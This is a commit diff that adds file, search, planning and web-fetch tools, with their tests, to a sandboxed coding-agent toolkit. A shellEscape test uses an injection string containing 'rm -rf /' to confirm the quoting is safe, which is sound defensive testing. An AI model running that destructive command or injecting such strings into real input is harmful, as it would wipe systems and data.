back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- lib/agent/__tests__/buildAgentTools.test.ts | 34 +++- lib/agent/buildAgentTools.ts | 29 ++- lib/agent/tools/__tests__/bashTool.test.ts | 14 +- .../tools/__tests__/editFileTool.test.ts | 86 +++++++++ lib/agent/tools/__tests__/globTool.test.ts | 97 ++++++++++ lib/agent/tools/__tests__/grepTool.test.ts | 103 +++++++++++ .../tools/__tests__/readFileTool.test.ts | 89 ++++++++++ lib/agent/tools/__tests__/shellEscape.test.ts | 20 +++ .../tools/__tests__/toDisplayPath.test.ts | 29 +++ .../tools/__tests__/todoWriteTool.test.ts | 28 +++ .../tools/__tests__/webFetchTool.test.ts | 96 ++++++++++ .../tools/__tests__/writeFileTool.test.ts | 52 ++++++ lib/agent/tools/bashTool.ts | 109 ++++++------ lib/agent/tools/editFileTool.ts | 100 +++++++++++ lib/agent/tools/globTool.ts | 165 ++++++++++++++++++ lib/agent/tools/grepTool.ts | 143 +++++++++++++++ lib/agent/tools/readFileTool.ts | 70 ++++++++ lib/agent/tools/shellEscape.ts | 14 ++ lib/agent/tools/toDisplayPath.ts | 34 ++++ lib/agent/tools/todoWriteTool.ts | 65 +++++++ lib/agent/tools/webFetchTool.ts | 124 +++++++++++++ lib/agent/tools/writeFileTool.ts | 65 +++++++ 22 files changed, 1491 insertions(+), 75 deletions(-) create mode 100644 lib/agent/tools/__tests__/editFileTool.test.ts create mode 100644 lib/agent/tools/__tests__/globTool.test.ts create mode 100644 lib/agent/tools/__tests__/grepTool.test.ts create mode 100644 lib/agent/tools/__tests__/readFileTool.test.ts create mode 100644 lib/agent/tools/__tests__/shellEscape.test.ts create mode 100644 lib/agent/tools/__tests__/toDisplayPath.test.ts create mode 100644 lib/agent/tools/__tests__/todoWriteTool.test.ts create mode 100644 lib/agent/tools/__tests__/webFetchTool.test.ts create mode 100644 lib/agent/tools/__tests__/writeFileTool.test.ts create mode 100644 lib/agent/tools/editFileTool.ts create mode 100644 lib/agent/tools/globTool.ts create mode 100644 lib/agent/tools/grepTool.ts create mode 100644 lib/agent/tools/readFileTool.ts create mode 100644 lib/agent/tools/shellEscape.ts create mode 100644 lib/agent/tools/toDisplayPath.ts create mode 100644 lib/agent/tools/todoWriteTool.ts create mode 100644 lib/agent/tools/webFetchTool.ts create mode 100644 lib/agent/tools/writeFileTool.ts diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index 52479cad0..5478c59ca 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,17 +1,35 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +const EXPECTED_TOOL_NAMES = [ + "bash", + "read", + "write", + "edit", + "grep", + "glob", + "todo_write", + "web_fetch", +] as const; + describe("buildAgentTools", () => { - it("returns a tools record keyed by tool name", () => { + it("returns a tools record with all 8 leaf tools registered", () => { const tools = buildAgentTools(); - expect(tools).toHaveProperty("bash"); - expect(typeof tools.bash).toBe("object"); + for (const name of EXPECTED_TOOL_NAMES) { + expect(tools).toHaveProperty(name); + } }); - it("each tool has an inputSchema, description, and execute", () => { - const tools = buildAgentTools(); - expect(tools.bash.inputSchema).toBeDefined(); - expect(tools.bash.description).toBeDefined(); - expect(typeof tools.bash.execute).toBe("function"); + it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => { + const tools = buildAgentTools() as Record< + string, + { description?: unknown; inputSchema?: unknown; execute?: unknown } + >; + for (const name of EXPECTED_TOOL_NAMES) { + const t = tools[name]!; + expect(typeof t.description).toBe("string"); + expect(t.inputSchema).toBeDefined(); + expect(typeof t.execute).toBe("function"); + } }); }); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index be6bde085..f9cbc2b39 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -1,4 +1,11 @@ import { bashTool } from "@/lib/agent/tools/bashTool"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { globTool } from "@/lib/agent/tools/globTool"; +import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; +import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; /** * Factory for the full agent tool set passed into `streamText({ tools })`. @@ -6,14 +13,26 @@ import { bashTool } from "@/lib/agent/tools/bashTool"; * at execute time — the factory takes no arguments because the tools are * stateless modulo that context. * - * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, - * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, - * `fetch`) port in follow-up PRs and slot into this record one-by-one - * without changing the factory signature. + * Currently ships 8 leaf tools: + * - bash, read, write, edit, grep, glob (sandbox / file ops) + * - todo_write (planning surface; stateless, echoes the list back) + * - web_fetch (HTTP via curl inside the sandbox) + * + * Composite tools (`task` subagent, `ask_user_question` UI part, + * `skill` skill discovery) port in a follow-up PR — they require + * subagent context plumbing / UI rendering / skill discovery infra + * that isn't in api today. */ export function buildAgentTools() { return { - bash: bashTool(), + bash: bashTool, + read: readFileTool, + write: writeFileTool, + edit: editFileTool, + grep: grepTool, + glob: globTool, + todo_write: todoWriteTool, + web_fetch: webFetchTool, }; } diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts index da9a999d3..568a7f72d 100644 --- a/lib/agent/tools/__tests__/bashTool.test.ts +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -34,7 +34,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = await tool.execute!({ command: "ls" }, { experimental_context: baseContext, } as never); @@ -64,7 +64,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "find ." }, { experimental_context: baseContext, } as never)) as { truncated?: boolean }; @@ -83,7 +83,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "ls", cwd: "apps/web" }, { experimental_context: baseContext, } as never); @@ -107,7 +107,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "curl example.com" }, { experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, } as never); @@ -121,7 +121,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: baseContext, } as never)) as { success: boolean; stdout: string }; @@ -134,7 +134,7 @@ describe("bashTool.execute", () => { const sandbox = makeSandbox({ execDetached: undefined }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: baseContext, } as never)) as { success: boolean; stderr: string }; @@ -148,7 +148,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, } as never); diff --git a/lib/agent/tools/__tests__/editFileTool.test.ts b/lib/agent/tools/__tests__/editFileTool.test.ts new file mode 100644 index 000000000..3a2cac81d --- /dev/null +++ b/lib/agent/tools/__tests__/editFileTool.test.ts @@ -0,0 +1,86 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(initialContent: string) { + let stored = initialContent; + return { + workingDirectory: "/sandbox/mono", + readFile: vi.fn(async () => stored), + writeFile: vi.fn(async (_path: string, content: string) => { + stored = content; + }), + getStored: () => stored, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("editFileTool", () => { + it("replaces a unique oldString once and reports the startLine", async () => { + const sb = makeSandbox("line one\nold value\nline three"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "old value", newString: "new value" }, + { experimental_context: ctx } as never, + )) as { success: boolean; replacements: number; startLine: number }; + expect(result.success).toBe(true); + expect(result.replacements).toBe(1); + expect(result.startLine).toBe(2); + expect(sb.getStored()).toBe("line one\nnew value\nline three"); + }); + + it("rejects when oldString === newString (no-op)", async () => { + const sb = makeSandbox("anything"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!({ filePath: "a.txt", oldString: "x", newString: "x" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/must be different/); + }); + + it("rejects when oldString is not in the file", async () => { + const sb = makeSandbox("hello world"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "missing", newString: "other" }, + { experimental_context: ctx } as never, + )) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/not found/); + }); + + it("rejects ambiguous edits (multiple matches without replaceAll)", async () => { + const sb = makeSandbox("foo\nfoo\nbar"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!({ filePath: "a.txt", oldString: "foo", newString: "baz" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/2 times/); + }); + + it("replaces all occurrences when replaceAll:true", async () => { + const sb = makeSandbox("foo bar foo baz foo"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "foo", newString: "qux", replaceAll: true }, + { experimental_context: ctx } as never, + )) as { success: boolean; replacements: number }; + expect(result.success).toBe(true); + expect(result.replacements).toBe(3); + expect(sb.getStored()).toBe("qux bar qux baz qux"); + }); +}); diff --git a/lib/agent/tools/__tests__/globTool.test.ts b/lib/agent/tools/__tests__/globTool.test.ts new file mode 100644 index 000000000..3f35d0a71 --- /dev/null +++ b/lib/agent/tools/__tests__/globTool.test.ts @@ -0,0 +1,97 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { globTool } from "@/lib/agent/tools/globTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("globTool", () => { + it("parses `mtime\\tsize\\tpath` output into structured file entries", async () => { + // Two files, newest first (sort already happens server-side in the command). + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: + "1700000000.0\t512\t/sandbox/mono/src/index.ts\n1699999000.5\t256\t/sandbox/mono/src/util.ts", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + const result = (await tool.execute!({ pattern: "**/*.ts" }, { + experimental_context: ctx, + } as never)) as { + success: boolean; + count: number; + files: Array<{ path: string; size: number; modifiedAt: string }>; + }; + expect(result.success).toBe(true); + expect(result.count).toBe(2); + expect(result.files[0]?.path).toBe("src/index.ts"); + expect(result.files[0]?.size).toBe(512); + expect(typeof result.files[0]?.modifiedAt).toBe("string"); // ISO + }); + + it("emits a recursive find (no -maxdepth) for `**/*.ts`", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + await tool.execute!({ pattern: "**/*.ts" }, { experimental_context: ctx } as never); + const cmd = sb.exec.mock.calls[0]?.[0] as string; + expect(cmd).not.toContain("-maxdepth"); + }); + + it("emits -maxdepth 1 for a bare `*.json` pattern (no recursion)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + await tool.execute!({ pattern: "*.json" }, { experimental_context: ctx } as never); + expect(sb.exec.mock.calls[0]?.[0]).toMatch(/-maxdepth\s+1/); + }); + + it("returns success:false on non-1 exit codes", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 2, + stdout: "err", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + const result = (await tool.execute!({ pattern: "**/*.ts" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/exit 2/); + }); +}); diff --git a/lib/agent/tools/__tests__/grepTool.test.ts b/lib/agent/tools/__tests__/grepTool.test.ts new file mode 100644 index 000000000..e3545f501 --- /dev/null +++ b/lib/agent/tools/__tests__/grepTool.test.ts @@ -0,0 +1,103 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("grepTool", () => { + it("parses `file:line:content` output into structured matches", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: + "/sandbox/mono/src/a.ts:5:export function login() {\n/sandbox/mono/src/a.ts:42: login();\n/sandbox/mono/src/b.ts:7:login()", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "login", path: "src" }, { + experimental_context: ctx, + } as never)) as { + success: boolean; + matches: Array<{ file: string; line: number; content: string }>; + filesWithMatches: number; + }; + expect(result.success).toBe(true); + expect(result.matches).toHaveLength(3); + expect(result.matches[0]).toEqual({ + file: "src/a.ts", + line: 5, + content: "export function login() {", + }); + expect(result.filesWithMatches).toBe(2); + }); + + it("treats exit code 1 (no matches) as success:true with empty matches", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 1, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "nothing", path: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; matchCount: number }; + expect(result.success).toBe(true); + expect(result.matchCount).toBe(0); + }); + + it("returns success:false for real grep errors (non-1 exit)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 2, + stdout: "", + stderr: "grep: invalid regex", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "[", path: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/invalid regex/); + }); + + it("passes -i for caseSensitive:false", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + await tool.execute!({ pattern: "x", path: ".", caseSensitive: false }, { + experimental_context: ctx, + } as never); + expect(sb.exec.mock.calls[0]?.[0]).toContain(" -i "); + }); +}); diff --git a/lib/agent/tools/__tests__/readFileTool.test.ts b/lib/agent/tools/__tests__/readFileTool.test.ts new file mode 100644 index 000000000..6d1d27fa3 --- /dev/null +++ b/lib/agent/tools/__tests__/readFileTool.test.ts @@ -0,0 +1,89 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(over: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + stat: vi.fn(), + readFile: vi.fn(), + ...over, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("readFileTool", () => { + it("reads a file and returns numbered lines", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 10, mtimeMs: 0 }), + readFile: vi.fn().mockResolvedValue("line one\nline two\nline three"), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "README.md" }, { + experimental_context: ctx, + } as never)) as { success: boolean; content: string; totalLines: number; path: string }; + expect(result.success).toBe(true); + expect(result.totalLines).toBe(3); + expect(result.content).toBe("1: line one\n2: line two\n3: line three"); + expect(result.path).toBe("README.md"); + }); + + it("honors offset + limit (1-indexed)", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 0, mtimeMs: 0 }), + readFile: vi.fn().mockResolvedValue("a\nb\nc\nd\ne"), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "x.txt", offset: 2, limit: 2 }, { + experimental_context: ctx, + } as never)) as { content: string; startLine: number; endLine: number }; + expect(result.startLine).toBe(2); + // `endLine` is the last line included (1-indexed). With offset=2,limit=2 + // we read lines 2 + 3 of a 5-line file, so endLine=3. + expect(result.endLine).toBe(3); + expect(result.content).toBe("2: b\n3: c"); + }); + + it("rejects directories", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => true, isFile: () => false, size: 0, mtimeMs: 0 }), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/directory/i); + }); + + it("returns success:false with an error string on stat/readFile failure", async () => { + const sb = makeSandbox({ + stat: vi.fn().mockRejectedValue(new Error("not found")), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "missing.ts" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/not found/); + }); +}); diff --git a/lib/agent/tools/__tests__/shellEscape.test.ts b/lib/agent/tools/__tests__/shellEscape.test.ts new file mode 100644 index 000000000..699605129 --- /dev/null +++ b/lib/agent/tools/__tests__/shellEscape.test.ts @@ -0,0 +1,20 @@ +import { describe, it, expect } from "vitest"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; + +describe("shellEscape", () => { + it("wraps a plain string in single quotes", () => { + expect(shellEscape("hello")).toBe("'hello'"); + }); + + it("escapes embedded single quotes via the standard ' → '\\'' dance", () => { + expect(shellEscape("it's")).toBe("'it'\\''s'"); + }); + + it("handles strings with shell metacharacters unchanged inside single quotes", () => { + expect(shellEscape("$VAR `cmd` && rm -rf /")).toBe("'$VAR `cmd` && rm -rf /'"); + }); + + it("returns just '' for the empty string", () => { + expect(shellEscape("")).toBe("''"); + }); +}); diff --git a/lib/agent/tools/__tests__/toDisplayPath.test.ts b/lib/agent/tools/__tests__/toDisplayPath.test.ts new file mode 100644 index 000000000..e862f7276 --- /dev/null +++ b/lib/agent/tools/__tests__/toDisplayPath.test.ts @@ -0,0 +1,29 @@ +import { describe, it, expect } from "vitest"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const WORKDIR = "/sandbox/mono"; + +describe("toDisplayPath", () => { + it("strips the workingDirectory prefix when the file is inside", () => { + expect(toDisplayPath("/sandbox/mono/src/index.ts", WORKDIR)).toBe("src/index.ts"); + }); + + it("returns `.` for the workingDirectory itself", () => { + expect(toDisplayPath("/sandbox/mono", WORKDIR)).toBe("."); + }); + + it("keeps an absolute path when it's outside the working directory", () => { + expect(toDisplayPath("/etc/hosts", WORKDIR)).toBe("/etc/hosts"); + }); + + it("resolves a relative input against the working directory", () => { + expect(toDisplayPath("apps/web/page.tsx", WORKDIR)).toBe("apps/web/page.tsx"); + }); + + it("normalizes back-slashes to forward slashes (Windows-style absolute input)", () => { + // path.resolve on POSIX leaves backslashes inside the segment; the + // helper should still emit forward slashes for paths it keeps absolute. + const result = toDisplayPath("/tmp/win\\path", WORKDIR); + expect(result.includes("\\")).toBe(false); + }); +}); diff --git a/lib/agent/tools/__tests__/todoWriteTool.test.ts b/lib/agent/tools/__tests__/todoWriteTool.test.ts new file mode 100644 index 000000000..7b5d88c9e --- /dev/null +++ b/lib/agent/tools/__tests__/todoWriteTool.test.ts @@ -0,0 +1,28 @@ +import { describe, it, expect } from "vitest"; +import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; + +describe("todoWriteTool", () => { + it("echoes the todos back with a count message", async () => { + const todos = [ + { id: "1", content: "ls the workspace", status: "in_progress" as const }, + { id: "2", content: "summarize what we found", status: "pending" as const }, + ]; + const result = (await todoWriteTool.execute!({ todos }, {} as never)) as { + success: boolean; + message: string; + todos: typeof todos; + }; + expect(result.success).toBe(true); + expect(result.message).toBe("Updated task list with 2 items"); + expect(result.todos).toEqual(todos); + }); + + it("accepts an empty list", async () => { + const result = (await todoWriteTool.execute!({ todos: [] }, {} as never)) as { + success: boolean; + message: string; + }; + expect(result.success).toBe(true); + expect(result.message).toBe("Updated task list with 0 items"); + }); +}); diff --git a/lib/agent/tools/__tests__/webFetchTool.test.ts b/lib/agent/tools/__tests__/webFetchTool.test.ts new file mode 100644 index 000000000..47fb75c92 --- /dev/null +++ b/lib/agent/tools/__tests__/webFetchTool.test.ts @@ -0,0 +1,96 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("webFetchTool", () => { + it("parses body + trailing status code on success", async () => { + // Body, then newline, then status code "200" (per the curl -w '%{http_code}' contract). + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: '{"ok":true}\n200', + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/api" }, { + experimental_context: ctx, + } as never)) as { success: boolean; status: number; body: string; truncated: boolean }; + expect(result).toEqual({ + success: true, + status: 200, + body: '{"ok":true}', + truncated: false, + }); + }); + + it("marks truncated:true on curl exit 23 (head -c cut off the body)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 23, + stdout: "huge body fragment\n200", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/huge" }, { + experimental_context: ctx, + } as never)) as { success: boolean; truncated: boolean }; + expect(result.success).toBe(true); + expect(result.truncated).toBe(true); + }); + + it("returns success:false on non-0, non-23 curl exit", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 7, + stdout: "", + stderr: "Failed to connect", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/unreachable" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Failed to connect/); + }); + + it("passes the request body for POST", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "ok\n201", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + await webFetchTool.execute!( + { url: "https://example.com/api", method: "POST", body: '{"x":1}' }, + { experimental_context: ctx } as never, + ); + const cmd = sb.exec.mock.calls[0]?.[0] as string; + expect(cmd).toContain("-X POST"); + expect(cmd).toContain("-d '{\"x\":1}'"); + }); +}); diff --git a/lib/agent/tools/__tests__/writeFileTool.test.ts b/lib/agent/tools/__tests__/writeFileTool.test.ts new file mode 100644 index 000000000..3656a777c --- /dev/null +++ b/lib/agent/tools/__tests__/writeFileTool.test.ts @@ -0,0 +1,52 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(over: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + mkdir: vi.fn().mockResolvedValue(undefined), + writeFile: vi.fn().mockResolvedValue(undefined), + stat: vi + .fn() + .mockResolvedValue({ size: 42, mtimeMs: 0, isDirectory: () => false, isFile: () => true }), + ...over, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("writeFileTool", () => { + it("creates parent dirs and writes content via sandbox.writeFile", async () => { + const sb = makeSandbox(); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = writeFileTool; + const result = (await tool.execute!({ filePath: "src/index.ts", content: "export {}" }, { + experimental_context: ctx, + } as never)) as { success: boolean; path: string; bytesWritten: number }; + expect(result.success).toBe(true); + expect(result.path).toBe("src/index.ts"); + expect(result.bytesWritten).toBe(42); + expect(sb.mkdir).toHaveBeenCalledWith("/sandbox/mono/src", { recursive: true }); + expect(sb.writeFile).toHaveBeenCalledWith("/sandbox/mono/src/index.ts", "export {}", "utf-8"); + }); + + it("returns success:false on sandbox failure", async () => { + const sb = makeSandbox({ + writeFile: vi.fn().mockRejectedValue(new Error("EACCES")), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = writeFileTool; + const result = (await tool.execute!({ filePath: "a.ts", content: "x" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/EACCES/); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts index 908113812..479a608db 100644 --- a/lib/agent/tools/bashTool.ts +++ b/lib/agent/tools/bashTool.ts @@ -21,9 +21,9 @@ const bashInputSchema = z.object({ }); /** - * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside - * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's - * working directory. + * `bash` sandbox tool. Runs `bash -c ""` inside the agent's + * sandbox via `sandbox.exec`, defaulting cwd to the sandbox's working + * directory. * * Approval gating is intentionally absent — model-issued commands are * trusted in this PR. Add a host-side gate at the route/UI layer if that @@ -34,9 +34,8 @@ const bashInputSchema = z.object({ * the right org. Detached execs deliberately skip env injection — those * processes outlive the prompt. */ -export const bashTool = () => - tool({ - description: `Execute a bash command in the user's shell (non-interactive). +export const bashTool = tool({ + description: `Execute a bash command in the user's shell (non-interactive). WHEN TO USE: - Running existing project 